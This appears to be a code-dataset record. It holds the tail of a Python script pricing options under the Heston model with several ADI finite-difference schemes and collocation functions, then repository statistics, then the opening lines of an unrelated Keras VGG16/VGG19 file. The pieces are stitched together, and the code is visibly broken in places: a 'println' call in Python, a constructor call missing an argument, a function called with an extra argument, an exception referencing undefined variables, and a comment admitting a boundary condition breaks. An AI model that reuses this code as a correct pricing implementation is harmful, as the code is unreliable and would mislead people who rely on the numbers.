ti -= dt*0.5
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
for j in range(L):
iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
lu2 = sla.splu(I+a*A2+BC)
F = lu2.solve(F)
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
lu1 = sla.splu(I+a*A1+BC)
F = lu1.solve(F)
N-=1
for i in range(N): #PROBLEM: BOUNDARY is NEUMAN, NOT DIRICHLET=>breaks
# Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
# for j in range(L):
# iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
# Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
ti -= dt*0.5
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
for j in range(L):
iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
# updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L)
Y0 = (I)*F-a*(A2*F)
updatePayoffBoundaryTrans(Y0,Sc,B,iBarrierList,M,L)
lu1 = sla.splu(I+a*A1+BC)
Y1 = lu1.solve(Y0)
Y1t = (I)*Y1-a*(A1*Y1)
# updatePayoffExplicitTrans(Y1t,Sc,B,iBarrierList,M,L) #FIXME ideally mirror F[ib-1] from F[ib]
updatePayoffBoundaryTrans(Y1t,Sc,B,iBarrierList,M,L)
lu2 = sla.splu(I+a*A2+BC)
Y2 = lu2.solve(Y1t)
F = Y2
ti -= dt*0.5
# Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
# for j in range(L):
# iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
# Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
# updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L)
elif method == "CN":
A = A0+A1+A2
a = 0.5
Li = I+a*A+BC
Le = I-(1-a)*A
lu = sla.splu(Li)
for i in range(N):
#updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L)
Y0 = Le*F
updatePayoffBoundaryTrans(Y0,Sc,B,iBarrierList,M,L)
F = lu.solve(Y0)
elif method == "PRLS":
a = 1 - math.sqrt(2)/2
#a*=0.5
Li = I+a*A1
lu = sla.splu(Li)
lu2 = sla.splu(I+a*(A0+A2))
for i in range(N): #TODO try TR like PR (A1 then A2) then BDF2 on Y2,A1 and BDF2 on Y2,A2.
F1 = lu.solve(F)
F1t = lu2.solve(F1)
F1t = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
F2 = lu2.solve(F1t)
F2t = lu.solve(F2)
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
elif method == "SLSB":
a = 1 - math.sqrt(2)/2
a*=0.5
Li = I+a*A1
lu = sla.splu(Li)
lu2 = sla.splu(I+a*(A0+A2))
for i in range(N):
F1 = lu2.solve(F)
F1t = lu2.solve(F1)
F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
F2 = lu.solve(F)
F2t = lu.solve(F2)#strang splitting?
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
F1 = lu.solve(F)
F1t = lu.solve(F1)
F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
F2 = lu2.solve(F)
F2t = lu2.solve(F2)
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
elif method == "Glowinski":
a = 1 - math.sqrt(2)/2
a2 = 1 - 2*a
lu = sla.splu(I+a*A2+BC)
lu2 = sla.splu(I+a2*(A0+A1)+BC)
for i in range(N):
Ft = F - a*A1*F
updatePayoffBoundaryTrans(Ft,Sc,B,iBarrierList,M,L)
F1 = lu.solve(Ft)
F1t = F1 - a2*A2*F1
updatePayoffBoundaryTrans(F1t,Sc,B,iBarrierList,M,L)
F2 = lu2.solve(F1t)
F2t = F2 - a*A1*F2
updatePayoffBoundaryTrans(F2t,Sc,B,iBarrierList,M,L)
F = lu.solve(F2t)
elif method == "SLS":
a = 1 - math.sqrt(2)/2
if B == 0:
A1tri*= a*0.5
A1tri[1,:]+=1
# A1tri[0]+= BCtri[0]
# A1tri[1]+= BCtri[1]
# A1tri[-1]+= BCtri[-1]
A2tri*=a
A2tri[1,:]+=1
# A2tri[0] += BC2tri[0]
# A2tri[1] += BC2tri[1]
# A2tri[-1] += BC2tri[-1]
for i in range(N):
F1 = la.solve_banded((1, 1), A1tri, F, overwrite_ab=False,overwrite_b=False, check_finite=False)
F1b = la.solve_banded((1, 1), A1tri, F1, overwrite_ab=False,overwrite_b=False, check_finite=False)
F = (1+math.sqrt(2))*F1b - math.sqrt(2)*F1
Ft = F[indicesInv]
F2t = la.solve_banded((1, 1), A2tri, Ft, overwrite_ab=False,overwrite_b=False, check_finite=False)
F2bt = la.solve_banded((1, 1), A2tri, F2t, overwrite_ab=False,overwrite_b=False, check_finite=False)
Ft = (1+math.sqrt(2))*F2bt - math.sqrt(2)*F2t
F = Ft[indices]
F1 = la.solve_banded((1, 1), A1tri, F, overwrite_ab=False,overwrite_b=False, check_finite=False)
F1b = la.solve_banded((1, 1), A1tri, F1, overwrite_ab=False,overwrite_b=False, check_finite=False)
F = (1+math.sqrt(2))*F1b - math.sqrt(2)*F1
else:
dt = T/N
for i in range(N):
ti = T - i*dt
Sc = np.array([cFunc.evaluate(ti+0.5*dt, Si) for Si in S])
for j in range(L):
iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
luh = sla.splu(I+0.5*a*A1+BC)
lu2 = sla.splu(I+a*(A0+A2)+BC)
F1 = luh.solve(F)
updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
F1t = luh.solve(F1)
F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
F2 = lu2.solve(F)
updatePayoffBoundaryTrans(F2,Sc,B,iBarrierList,M,L)
F2t = lu2.solve(F2)#strang splitting?
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F2
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
F1 = luh.solve(F)
updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
F1t = luh.solve(F1)
F = (1+math.sqrt(2))*F1t - math.sqrt(2)*F1
else: #if method =="LS":
a = 1 - math.sqrt(2)/2
dt = -T/N
if B==0:
A = A0+A1+A2
Li = I+a*A+BC
lu = sla.splu(Li) #ilu(Li,drop_tol=1e-10,fill_factor=1000)
for i in range(N):
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
F1 = lu.solve(F)
updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
#F = np.maximum(F,0)
else:
for i in range(N):
ti = T*(N-i)/N
ti = ti+a*dt
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
for j in range(L):
iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
A = A0+A1+A2
Li = I+a*A+BC
lu = sla.splu(Li) #ilu(Li,drop_tol=1e-10,fill_factor=1000)
F1 = lu.solve(F)
ti = ti+a*dt
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
for j in range(L):
iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
updatePayoffBoundaryTrans(F1,Sc,B,iBarrierList,M,L)
A = A0+A1+A2
Li = I+a*A+BC
lu = sla.splu(Li) #ilu(Li,drop_tol=1e-10,fill_factor=1000)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
end=time.time()
#F[50+4*M]
#S0=101.52
Payoff = F.reshape(L,M)
# print("Payoff V=0",Payoff[0])
# jv0 = np.searchsorted(V,v0)
# print("Payoff V=V0",V[jv0])
# for (si,pi) in zip(S[:M], Payoff[jv0]):
# print(si, pi)
#
# # istrike =np.searchsorted(S,K)
# # print("Payoff S=K",S[istrike])
# # for (vi,pi) in zip(V, Payoff[:][istrike]):
# # print(vi, pi)
# #plt.ion()
# plt.grid(True)
# plt.plot(S[iBarrier:iBarrier+30], Payoff[jv0][iBarrier:iBarrier+30])
# #plt.plot(V,Payoff[:][istrike])
# plt.yscale('symlog',linthreshy=1e-6)
# plt.show()
#Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
Payoffi = interpolate.RectBivariateSpline(V,X,Payoff,kx=3,ky=3,s=0)
# Sp = np.exp(X-alpha*v0)
# Vp = [(Payoffi(v0,x,dy=2)[0][0]-Payoffi(v0,x,dy=1)[0][0])*np.exp(-2*(x-alpha*v0)) for x in X]
# for Si, Vi in zip(Sp,Vp):
# print(Si, "PR-Damped-S", Vi)
#
# plt.grid(True)
# # plt.plot(np.exp(X-alpha*v0),[Payoffi(v0,x,dy=2)[0][0] for x in X])
# plt.plot(Sp,Vp)
# # z = z(y,v) = y - alpha*v, v= v => d/dy = d/dz*dz/dy
# plt.show()
maxError = 0.0
# Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
for spot,refPrice in zip(spotArray,priceArray):
x0 = math.log(spot)+alpha*v0
price = Payoffi(v0,x0)[0][0]
delta = Payoffi(v0,x0,dy=1)[0][0]
gamma = Payoffi(v0,x0,dy=2)[0][0]
error = price -refPrice
if abs(error) > maxError:
maxError = abs(error)
if B==0:
print(spot,method,N,M,L, price, delta,gamma,error,end-start)
if B == 0:
pass #print(method,N,M,L,maxError,end-start)
else:
x0 = math.log(K)+alpha*v0
print(method,N,M,L,Payoffi(v0,x0)[0][0],end-start)
def priceAlbrecherSpace():
v0=0.04
kappa = 1.5
theta = 0.04
sigma = 0.3
rho = -0.9
r = 0.025
q = 0.0
T = 1.0
K = 100.0
B = 0.0
spotArray = [80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120]
priceArray = [0.4290429592804125, 0.5727996675731273, 0.7455984677403922, 0.9488855729391782, 1.1836198521834569, 1.4503166421285438, 1.7491038621459454, 2.079782505454696, 2.4418861283930053, 2.834736019523883, 3.257490337101448, 3.709186519701557, 4.188777097589518, 4.6951592762243415, 5.227198998513091, 5.7837501984978665, 6.363669958734282, 6.965830262856437, 7.589126920735202, 8.232486143930792, 8.894869093849636, 9.575277129770623, 10.272748751757314, 10.986365852615036, 11.715254013220457, 12.458577567319875, 13.215544738495424, 13.98540421747423, 14.767442110445812, 15.560982138391632, 16.36538729643898, 17.180051769091545, 18.004405483745735, 18.8379101967189, 19.68005854335592, 20.53036894075123, 21.388390582359417, 22.25369629176841, 23.12588767795124, 24.004578691901752, 24.889416575642677]
M = 401 #X
L = 101 #V
Ms = [25, 51, 101, 201, 401]
Ls = [12, 25, 51, 101, 201]
Ms = [201]
Ls= [31]
N = 32#s = [4,8,16,32,64,128] #timesteps
for L,M in zip(Ls,Ms):
priceCall(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K, B, N, M, L)
def priceAlbrecherTime():
v0=0.04
kappa = 1.5
theta = 0.04
sigma = 0.3
rho = -0.9
r = 0.025
q = 0.0
T = 1.0
K = 100.0
B=0 #90.0
spotArray = [80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120]
priceArray = [0.4290429592804125, 0.5727996675731273, 0.7455984677403922, 0.9488855729391782, 1.1836198521834569, 1.4503166421285438, 1.7491038621459454, 2.079782505454696, 2.4418861283930053, 2.834736019523883, 3.257490337101448, 3.709186519701557, 4.188777097589518, 4.6951592762243415, 5.227198998513091, 5.7837501984978665, 6.363669958734282, 6.965830262856437, 7.589126920735202, 8.232486143930792, 8.894869093849636, 9.575277129770623, 10.272748751757314, 10.986365852615036, 11.715254013220457, 12.458577567319875, 13.215544738495424, 13.98540421747423, 14.767442110445812, 15.560982138391632, 16.36538729643898, 17.180051769091545, 18.004405483745735, 18.8379101967189, 19.68005854335592, 20.53036894075123, 21.388390582359417, 22.25369629176841, 23.12588767795124, 24.004578691901752, 24.889416575642677]
M = 201 #X
L = 101 #V
Ns = [2048, 1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
for N in Ns:
priceCall(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K,B, N, M, L)
def priceBloombergSpace():
kappa = 3.0
theta = 0.12
sigma = 0.04
rho = 0.6 #!FIXME breaks with - sign. : iStrike not in array!?
r = 0.01
q = 0.04
v0=theta
T=1.0
K=100.0
B=0.0
spotArray = [80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120]
priceArray = [4.126170747504533, 4.408743197301329, 4.70306357455405, 5.009202471608047, 5.327215893333642, 5.657145552450321, 5.999019203695557, 6.3528510118569015, 6.718641951722364, 7.096380233599666, 7.486041751584794, 7.887590552192177, 8.300979318221902, 8.726149865537172, 9.163033649989693, 9.611552278338717, 10.071618030216948, 10.543134388629074, 11.025996479014745, 11.520091740844437, 12.025300295511904, 12.54149551835306, 13.068544517640353, 13.606308624804461, 14.154643874270963, 14.713401467714998, 15.282428228751144, 15.861567038426507, 16.450657265344518, 17.04953517774978, 17.658034469027065, 18.2759861100527, 18.903219497330056, 19.539562310453945, 20.184840914482272, 20.838880779749626, 21.501506644797566, 22.17254294281439, 22.85181397102651, 23.539144197874872, 24.23435849148654]
Ms = [25, 51, 101, 201, 401]
Ls = [12, 25, 51, 101, 201]
Ms = [51]
Ls= [12]
N = 32#s = [4,8,16,32,64,128] #timesteps
for L,M in zip(Ls,Ms):
priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K, B, N, M, L)
def priceBloombergTime():
kappa = 3.0
theta = 0.12
sigma = 0.04
rho = 0.6
r = 0.01
q = 0.04
v0=theta
T=1.0
K=100.0
spotArray = [80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120]
priceArray = [4.126170747504533, 4.408743197301329, 4.70306357455405, 5.009202471608047, 5.327215893333642, 5.657145552450321, 5.999019203695557, 6.3528510118569015, 6.718641951722364, 7.096380233599666, 7.486041751584794, 7.887590552192177, 8.300979318221902, 8.726149865537172, 9.163033649989693, 9.611552278338717, 10.071618030216948, 10.543134388629074, 11.025996479014745, 11.520091740844437, 12.025300295511904, 12.54149551835306, 13.068544517640353, 13.606308624804461, 14.154643874270963, 14.713401467714998, 15.282428228751144, 15.861567038426507, 16.450657265344518, 17.04953517774978, 17.658034469027065, 18.2759861100527, 18.903219497330056, 19.539562310453945, 20.184840914482272, 20.838880779749626, 21.501506644797566, 22.17254294281439, 22.85181397102651, 23.539144197874872, 24.23435849148654]
M = 101 #X
L = 21 #V
B=0
Ns = [2048,1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
Ns.reverse()
for N in Ns:
priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K, B, N, M, L)
def priceQLBarrierTime():
kappa = 2.5
theta = 0.04
sigma = 0.66
rho = -0.8
r = 0.05
q = 0.0
v0=theta
T=1.0
K=100.0
isCall = True
spotArray = [80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120]
priceArray = [4.126170747504533, 4.408743197301329, 4.70306357455405, 5.009202471608047, 5.327215893333642, 5.657145552450321, 5.999019203695557, 6.3528510118569015, 6.718641951722364, 7.096380233599666, 7.486041751584794, 7.887590552192177, 8.300979318221902, 8.726149865537172, 9.163033649989693, 9.611552278338717, 10.071618030216948, 10.543134388629074, 11.025996479014745, 11.520091740844437, 12.025300295511904, 12.54149551835306, 13.068544517640353, 13.606308624804461, 14.154643874270963, 14.713401467714998, 15.282428228751144, 15.861567038426507, 16.450657265344518, 17.04953517774978, 17.658034469027065, 18.2759861100527, 18.903219497330056, 19.539562310453945, 20.184840914482272, 20.838880779749626, 21.501506644797566, 22.17254294281439, 22.85181397102651, 23.539144197874872, 24.23435849148654]
M = 101 #X
L = 21 #V
B=0.
Ns = [2048,1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
Ns.reverse()
for N in Ns:
priceCall(isCall, spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, K, B, N, M, L)
class IdentityFunction:
def __init__(self):
pass
def evaluate(self, z):
return z
class CollocationFunction:
X = []
A = []
B = []
C = []
leftSlope = 0.0
rightSlope = 0.0
T = 0.0
def __init__(self, X, A, B, C,leftSlope,rightSlope, T):
self.X = X
self.A = A
self.B = B
self.C = C
self.leftSlope = leftSlope
self.rightSlope = rightSlope
self.T = T
def evaluateSlice(self, z):
if z <= self.X[0]:
return self.leftSlope*(z-self.X[0]) + self.A[0]
elif z >= self.X[-1]:
return self.rightSlope*(z-self.X[-1])+self.A[-1]
i = np.searchsorted(self.X,z) # x[i-1]<z<=x[i]
if i > 0:
i -= 1
h = z-self.X[i]
return self.A[i] + h*(self.B[i]+h*self.C[i])
def evaluate(self, t, z):
return t/self.T * self.evaluateSlice(z) + (1.0-t/self.T)*z #linear interpolation between slice at t=0 and slice T.
def solve(self, strike):
if strike < self.A[0]:
sn = self.leftSlope
return (strike-self.A[0])/sn + self.X[0]
elif strike > self.A[-1]:
sn = self.rightSlope
return (strike-self.A[-1])/sn + self.X[-1]
i = np.searchsorted(self.A,strike) # a[i-1]<strike<=a[i]
# print("index",self.A[i-1],strike,self.A[i],len(self.A))
if abs(self.A[i]-strike)< 1e-10:
return self.X[i]
if abs(self.A[i-1]-strike)< 1e-10:
return self.X[i-1]
if i == 0:
i+=1
x0 = self.X[i-1]
c = self.C[i-1]
b = self.B[i-1]
a = self.A[i-1]
d = 0
cc = a + x0*(-b+x0*(c-d*x0)) - strike
bb = b + x0*(-2*c+x0*3*d)
aa = -3*d*x0 + c
allck = np.roots([aa,bb,cc])
for ck in allck:
if abs(ck.imag) < 1e-10 and ck.real >= self.X[i-1]-1e-10 and ck.real <= self.X[i]+1e-10:
return ck.real
raise Exception("no roots found in range", allck, strike, aa, bb, cc, i,self.X[i-1],self.X[i])
def priceSX5ETime():
#Spline 1e-5 pennalty
A=[0.6287965835693049 ,0.8796805556963849 , 0.9548458991431029 ,0.9978807937190832 ,1.0432949917908245, 1.0951689975427406, 1.1780329537431, 1.2767467611605525]
B=[0.846962887118158, 0.5006951388813219 ,1.3162296284270554, 0.764281474912235, 1.4312564546785838, 1.0765792448141005, 0.9264392665602718]
C=[-0.46500629962499923, 4.928351101396242, -6.670948501034147, 8.061184212984527, -4.286695020953507, -0.907309913530479, -1.9936316682418205]
X=[0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
leftSlope=0.846962887118158
rightSlope=0.2666342520834516
#Spline 1e-3 penalty
A=[0.6266758553145932, 0.8838690008217314 ,0.9511741483703275, 0.9972169412308787 ,1.045230848712316, 1.0932361943842062, 1.1786839882076958, 1.2767419415280061]
B=[0.8329310535215612, 0.5486175716699259, 1.0783076034285555 ,1.1476195823811128 ,1.173600641673776, 1.1472056638621118, 0.918270335988941]
C=[-0.38180731761048253, 3.2009663415588276, 0.8377175268235754, 0.31401193651971954 ,-0.31901463307065175, -1.3834775717464938, -1.9682171790586938]
X=[0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
leftSlope=0.8329310535215612
rightSlope=0.2668764075068484
#Absorption 0.001 0
# print("slope left",(cFunc.evaluate(X[0]+1e-7)-cFunc.evaluate(X[0]))/1e-7,leftSlope)
# print("slope r",(cFunc.evaluate(X[-1]-1e-7)-cFunc.evaluate(X[-1]))/1e-7,rightSlope)
kappa = 0.35
theta = 0.321
sigma = 1.388
rho = -0.63
r = 0.0
q = 0.0
v0=0.133
T=0.4986301369863014
cFunc = CollocationFunction(X,A,B,C,leftSlope,rightSlope,T)
K=1.0
spotArray = [1.0] #max(s-K) = max(s/K-1)*K
priceArray = [0.07260310]
priceArray = [0.07278065]
# K=0.7
# spotArray = [1.0]
# priceArray = [0.30953450-0.3] #P = C- F-K
# priceArray = [0.00960629]
# K=1.4
# spotArray = [1.0]
# priceArray = [0.00015184+.4]
# priceArray = [0.40015225]
M = 128 #X
L = 128 #V
B=0.8
# Ns = [4096,2048,1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
Ns = [4096,1024, 768,512, 384, 256, 192, 128, 96, 64, 56, 48, 32, 24, 16, 12, 8 ,6,4] #timesteps
# Ns = [72,60,12]
Ns.reverse()
for N in Ns:
priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K, B, N, M, L)
def priceSX5ESpace():
#Spline 1e-5 pennalty
A=[0.6287965835693049 ,0.8796805556963849 , 0.9548458991431029 ,0.9978807937190832 ,1.0432949917908245, 1.0951689975427406, 1.1780329537431, 1.2767467611605525]
B=[0.846962887118158, 0.5006951388813219 ,1.3162296284270554, 0.764281474912235, 1.4312564546785838, 1.0765792448141005, 0.9264392665602718]
C=[-0.46500629962499923, 4.928351101396242, -6.670948501034147, 8.061184212984527, -4.286695020953507, -0.907309913530479, -1.9936316682418205]
X=[0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
leftSlope=0.846962887118158
rightSlope=0.2666342520834516
#Spline 1e-3 penalty
# A=[0.6266758553145932, 0.8838690008217314 ,0.9511741483703275, 0.9972169412308787 ,1.045230848712316, 1.0932361943842062, 1.1786839882076958, 1.2767419415280061]
# B=[0.8329310535215612, 0.5486175716699259, 1.0783076034285555 ,1.1476195823811128 ,1.173600641673776, 1.1472056638621118, 0.918270335988941]
# C=[-0.38180731761048253, 3.2009663415588276, 0.8377175268235754, 0.31401193651971954 ,-0.31901463307065175, -1.3834775717464938, -1.9682171790586938]
# X=[0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
# leftSlope=0.8329310535215612
# rightSlope=0.2668764075068484
#Absorption 0.001 0
cFunc = CollocationFunction(X,A,B,C,leftSlope,rightSlope)
println("S=1 => X=",cFunc.solve(1.0))
# print("slope left",(cFunc.evaluate(X[0]+1e-7)-cFunc.evaluate(X[0]))/1e-7,leftSlope)
# print("slope r",(cFunc.evaluate(X[-1]-1e-7)-cFunc.evaluate(X[-1]))/1e-7,rightSlope)
kappa = 0.35
theta = 0.321
sigma = 1.388
rho = -0.63
r = 0.0
q = 0.0
v0=0.133
T=0.4986301369863014
K=1.0
spotArray = [1.0] #max(s-K) = max(s/K-1)*K
priceArray = [0.07260310]
# priceArray = [0.07278065]
# K=0.7
# spotArray = [1.0]
# priceArray = [0.30953450-0.3] #P = C- F-K
# priceArray = [0.00960629]
# K=1.4
# spotArray = [1.0]
# priceArray = [0.00015184+.4]
# priceArray = [0.40015225]
Ms= [8,12, 16,24, 32,48, 64, 96, 128,192, 256,512] #X
Ls = [8,12, 16,24, 32,48, 64, 96, 128,192, 256,512] #V
L = 256
B=0
#Ns = [4096,2048,1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
N = 64 #timesteps
for L,M in zip(Ls,Ms):
# for M in Ms:
priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K, B, N, M, L)
class PolyCollocationFunction:
coeff = []
def __init__(self, coeff):
self.coeff = coeff
def evaluate(self, z):
return np.polyval(self.coeff,z)
def solve(self, strike):
c = self.coeff.copy()
c[-1] -= strike
allck = np.roots(c)
#print("allck",allck)
for ck in allck:
if abs(ck.imag) < 1e-10:
return ck.real
raise Exception("no roots found in range", allck, strike, aa, bb, cc, i,self.X[i-1],self.X[i])
def pricePolySX5ETime():
coeff = [-0.01969830242950278 ,0.9836590390856135 ,-2.127280418584288, 24.46758278682982 ,-68.69895549895567, 81.68521250909365 ,-44.40158377607094 ,9.096571378087397]
coeff = [0.17074678852059158 ,0.824747250438463, 0.0071906167596872, 5.6862073468872206e-05]
coeff.reverse()
cFunc = PolyCollocationFunction(coeff)
# print("slope left",(cFunc.evaluate(X[0]+1e-7)-cFunc.evaluate(X[0]))/1e-7,leftSlope)
# print("slope r",(cFunc.evaluate(X[-1]-1e-7)-cFunc.evaluate(X[-1]))/1e-7,rightSlope)
kappa = 0.35
theta = 0.321
sigma = 1.388
rho = -0.63
r = 0.0
q = 0.0
v0=0.133
T=0.4986301369863014
K=1.0
spotArray = [1.0] #max(s-K) = max(s/K-1)*K
priceArray = [0.07211350]
priceArray = [0.06937973] #call
# K=0.7
# spotArray = [1.0]
# priceArray = [0.31095779]
K=1.4
spotArray = [1.0]
priceArray = [0.39934721]
M =64
L = 201 #V
B=0
Ns = [2048,1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
Ns.reverse()
for N in Ns:
priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K, B, N, M, L)
def main():
# priceAlbrecherSpace()
# priceAlbrecherTime()
#priceBloombergSpace()
#priceBloombergTime()
priceSX5ETime()
if __name__ =='__main__':
main()
| 40.283807
| 817
| 0.515464
| 15,826
| 93,539
| 3.03608
| 0.047074
| 0.020146
| 0.023414
| 0.020479
| 0.886033
| 0.868738
| 0.850049
| 0.826802
| 0.8083
| 0.792316
| 0
| 0.156611
| 0.283101
| 93,539
| 2,321
| 818
| 40.301163
| 0.559918
| 0
| 0
| 0.797059
| 0
| 0
| 0.003321
| 0
| 0
| 0
| 0
| 0.000431
| 0
| 0
| null | null | 0.001176
| 0.006471
| null | null | 0.004118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3503f7de1e83c0d653621f99c6c9ecc7834297e7
| 13,905
|
py
|
Python
|
iot/Executer/vgg16boostvgg19.py
|
Derfei/MergingandScheduling
|
544612a45a5e7db270f51782f1bb08006e3e348a
|
[
"MIT"
] | 1
|
2021-12-17T17:56:12.000Z
|
2021-12-17T17:56:12.000Z
|
iot/Executer/vgg16boostvgg19.py
|
Derfei/task-merging-and-scheduling-for-deep-learning-applications-in-mobile-edge-computing
|
544612a45a5e7db270f51782f1bb08006e3e348a
|
[
"MIT"
] | null | null | null |
iot/Executer/vgg16boostvgg19.py
|
Derfei/task-merging-and-scheduling-for-deep-learning-applications-in-mobile-edge-computing
|
544612a45a5e7db270f51782f1bb08006e3e348a
|
[
"MIT"
] | 1
|
2021-09-07T01:26:17.000Z
|
2021-09-07T01:26:17.000Z
|
# -*- coding: utf-8 -*-
'''
@author: longxin
@version: 1.0
@date:
@changeVersion:
@changeAuthor:
@description:
'''
class util_vgg16boostvgg19:
@classmethod
def get_vgg16model(cls):
WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
from keras.models import Model
from keras.layers import Flatten
from keras.layers import Dense
from keras.layers import Input
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
